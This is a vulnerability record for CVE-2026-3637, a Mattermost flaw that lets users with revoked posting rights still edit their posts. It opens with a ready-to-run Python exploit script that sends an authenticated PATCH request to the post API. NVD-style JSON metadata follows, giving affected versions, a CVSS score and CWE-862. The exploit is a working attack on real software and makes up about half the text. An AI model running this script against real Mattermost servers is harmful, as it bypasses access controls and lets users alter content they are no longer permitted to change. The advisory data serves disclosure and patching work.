CVE-2026-3637

import requests # Exploit Title: Mattermost Post Edit Privilege Bypass (CVE-2026-3637) # Description: Edit a post after 'create_post' permission has been revoked. TARGET_URL = "https://mattermost.example.com" POST_ID = "ORIGINAL_POST_ID" AUTH_TOKEN = "YOUR_AUTH_TOKEN" # User's valid session token after permission revocation def exploit(): headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json" } # Payload to update the post payload = { "message": "This post has been modified via API bypass." } # Sending the PATCH request to update the post response = requests.patch(f"{TARGET_URL}/api/v4/posts/{POST_ID}", headers=headers, json=payload) if response.status_code == 200: print("[+] Exploit successful! Post modified.") print(f"[+] Response: {response.json()}") else: print("[-] Exploit failed.") print(f"[-] Status Code: {response.status_code}") print(f"[-] Response: {response.text}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-3637", "sourceIdentifier": "[email protected]", "published": "2026-05-18T08:16:14.040", "lastModified": "2026-05-19T17:34:01.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check the create_post channel permission during post edit operations which allows an authenticated attacker with revoked posting privileges to modify their existing posts via direct API requests to the post update and patch endpoints.. Mattermost Advisory ID: MMSA-2026-00627"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.14", "matchCriteriaId": "413D9405-79C3-4299-B0DC-40D9EE5CC717"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.4", "matchCriteriaId": "CF171039-837A-4D23-87EB-F328AD04976C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.5.0", "versionEndExcluding": "11.5.2", "matchCriteriaId": "726AD6AD-6C01-45BB-9115-B8209717A6D4"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}